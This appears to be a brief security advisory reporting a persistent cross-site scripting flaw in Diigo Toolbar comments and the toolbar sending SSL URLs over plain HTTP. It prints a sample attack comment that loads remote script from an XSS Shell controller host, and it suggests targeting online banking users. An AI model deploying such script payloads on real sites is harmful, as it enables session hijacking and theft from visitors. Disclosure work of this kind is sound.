Diigo Toolbar - Global XSS and Information Leakage in SSL URLs
== Global XSS ==
Diigo is (http://www.diigo.com/) a social bookmarking and sharing
application which allows users to see other users comments and notes
for every website. For this feature users should use Diigolet
bookmarklet or Diigo Toolbar - http://www.diigo.com/tools. These are
almost mandatory to use Diigo and almost all Diigo members have them
installed.
An attacker can do Cross-site Scripting in these public comments and
that comment will affect any other user of Diigo Toolbar and Diigolet
who visits the website. This means a Diigo user can backdoor any
website in the internet easily with a permanent XSS and any other
Diigo user who visits this website will be affected. Vulnerability
exists in:
These comments will be injected into the current domain context, thus
an attacker can execute a Javascript code in the target domain,
Target URL can be over SSL as well. All Diigo tools users are affected
from this vulnerability.
For an attacker this is a perfect opportunity to use some XSS bot
manager application such as XSS Shell, Also an attacker can attack
high profile websites such as online banking applications. Considering
you can search in shared bookmarks so you can actually people who uses
a certain online banking application.
Sample attack comment can be:
<script src="http://example.com/xssshell/"></script>
== Fix ==
Download latest version of Diigo Toolbar
== Disclosure Timeline ==
== Information Leakage in SSL URLs ==
Diigo toolbar is sending all SSL URLs to their servers over HTTP for
shared comment feature, which might cause to leak session_ids over URL
or any other sensitive information transferred over URL.
== Fix ==
User can not opt-out from this feature. There is no known fix, this
looks like considered as a feature not a bug.
== Disclosure Timeline ==
–
Ferruh Mavituna
http://ferruh.mavituna.com